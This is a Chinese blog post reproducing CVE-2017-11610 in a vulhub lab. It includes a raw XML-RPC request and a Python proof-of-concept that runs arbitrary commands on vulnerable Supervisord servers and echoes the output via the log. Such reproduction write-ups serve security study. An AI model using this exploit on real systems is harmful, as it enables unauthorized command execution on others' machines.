Supervisord 远程命令执行漏洞(CVE-2017-11610)

最新推荐文章于 2023-06-07 18:58:32 发布
最新推荐文章于 2023-06-07 18:58:32 发布
阅读量723 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119752696
版权

漏洞简介

Supervisor是一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。

影响范围

  • 3.0.1之前的版本
  • 3.1.4之前的3.1.x版本
  • 3.2.4之前的3.2.x版本
  • 3.3.3之前的3.3.x版本

漏洞复现

发送以下数据包即可执行任意命令:

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>

在vulhub的文章中也写到,有回显版本的POC,原理是将输出结果写入log,再调用Supervisord自带的readLog方法读取log文件,就可以达到回显的效果:

#!/usr/bin/env python3
import xmlrpc.client
import sys


target = sys.argv[1]
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
    old = getattr(proxy, 'supervisor.readLog')(0,0)

    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
    result = getattr(proxy, 'supervisor.readLog')(0,0)

    print(result[len(old):])

用法是./poc.py "http://your-ip:9001/RPC2" "command"
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程桌面漏洞poc_Supervisord 远程代码执行漏洞(CVE201711610)漏洞复现
weixin_39730263的博客
12-10 148
漏洞信息Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进程状态的功能,在进程异常退出时能够自动重启进程。Supervisord在配置了Web接口后,服务器会启动一个XMLRPC服务器,端口号为9001,利用本漏洞,在获取接口访问权限后,远程攻击者可利用发送一段...
Python-基于ssh秘钥supervisord的发布系统
08-10
标题中的“Python-基于ssh秘钥supervisord的发布系统”揭示了这是一个使用Python语言构建的自动化部署方案,它依赖于SSH密钥对进行安全的身份验证,并利用supervisord来管理和监控服务进程。在中小公司环境中,这样...
supervisord命令 配置后台服务/常驻进程的进程工具
01-09
语法格式: supervisord [参数] 常用参数: status 查看程序状态 start 启动程序 stop 关闭程序 update 重启配置文件修改过的程序 参考实例 查看进程运行状态: [root@linuxcool ~]# supervisorctl ...
docker-supervisord-monitor:Docker Supervisord 监视器
06-20
通过`docker-supervisord-monitor-master`这个项目,我们可以获取一个示例实现,它可能包含了设置和使用Docker Supervisord监视器所需的所有文件和脚本。这些文件可能包括配置文件、启动脚本、日志处理逻辑等,帮助...
docker-supervisord-example:Docker Supervisord 示例
07-05
Docker Supervisord 示例首先准备docker镜像 docker build -t test-supervisor .启动一个新容器只需带来一组新的守护进程 docker run -d -p 9001:9001 test-supervisor就是这样! 通过以下方式检查您的守护进程: ...
laravel-lumen-docker:LaravelLumen Docker支架
05-22
官方Docker镜像)目录结构 +-- src <project>+-- resources| +-- default| +-- nginx.conf| +-- supervisord.conf| +-- www.conf+-- .gitignore+-- Dockerfile+-- docker-compose.yml+-- readme.md 设定说明先决条件...
Supervisord远程命令执行漏洞分析(CVE-2017-11610)
zzkk_的博客
08-10 5573
Supervisord是一款由Python语言开发,用于管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。 近期,Supervisord曝出了一个需认证的远程命令执行漏洞CVE-2017-11610),通过POST请求Supervisord管理界面恶意数据,可以获取服务器操作权限,存在严重的安全风险。 Supervisor介绍 Supervisor 是基于 Pyt
Vulhub Supervisord 远程命令执行漏洞复现
weixin_53696027的博客
06-07 267
Vulhub Supervisord 远程命令执行漏洞复现
Supervisord 远程代码执行漏洞CVE-2017-11610)漏洞复现
OKAY_TC的博客
04-22 3910
复现视频链接:https://www.ichunqiu.com/course/58895 如下内容为复现及笔记 Supervisord 远程代码执行漏洞CVE-2017-11610)漏洞复现 0x01 漏洞信息 Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进...
buuctf [Supervisor]CVE-2017-11610
qq_1873822的博客
03-28 264
漏洞描述 Supervisor是一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。 https://blog.csdn.net/qq_37964989/article/details/89454076 漏洞影响 supervisor 3.0.1之前的版本,3.1.4之前的3.1.x版本,3.2.4之前的3.2.x版本,
python supervisord 远程命令执行漏洞CVE-2017-11610)
whatday的专栏
06-27 751
Supervisord Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd。 我觉得它相比Systemd有几个特点: 配置比较简单 一个简单的第三方应用,与系统没有耦合 提供HTTP API,支持远程操作 所以,我之前把他用来跑一些Web应用。 Supervisord的架构分为Server和Client,Server以一个服务的形式,跑在系统后台,而Client是一个命令行工具,其实就是根据用户的要求,调用Server提供的A
Supervisord远程命令执行漏洞(CVE-2017-11610)
谢公子的博客
09-20 2960
目录 Supervisor 漏洞复现 修复建议 Supervisor Supervisor是使用Python 开发的进程管理程序,一般使用命令行进行管理,当然也能通过web接口图形化管理服务。在配置了web接口后,服务器会启动一个XML RPC服务器,端口为9001,默认配置接口是不需要密码访问的,管理员也可设置为密码访问。利用本漏洞,在获取该接口的访问权限后,远程攻击者可发送一段精心构...
supervisor(三)xml_rpc
weixin_33694172的博客
08-15 327
supervisor提供的两种管理方式,supervisorctl和web其实都是通过xml_rpc来实现的。xml_rpc其实就是本地可以去调用远端的函数方法,然后函数方法经过一番处理后,把结果返回给我们。xml_rpc不懂的同学建议去百度百度它的原理机制。这个比较简单,楼主也是上午刚搞懂。 在python里面实现xml_rpc就更加的简单,用SimpleXM...
supervisord -c /etc/supervisord.conf
最新发布
01-06
supervisord -c /etc/supervisord.conf是一个命令,用于启动supervisord进程,并指定配置文件为/etc/supervisord.conf。这个命令会根据配置文件中的设置来管理和监控各个进程。 以下是使用supervisord -c /etc/supervisord.conf启动supervisord的步骤: 1. 进入终端或命令行界面。 2. 输入以下命令: ```shell supervisord -c /etc/supervisord.conf ``` 3. 按下回车键执行命令执行以上命令后,supervisord将会读取/etc/supervisord.conf配置文件中的设置,并启动相应的进程。这样,supervisord就可以管理和监控这些进程的运行状态了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值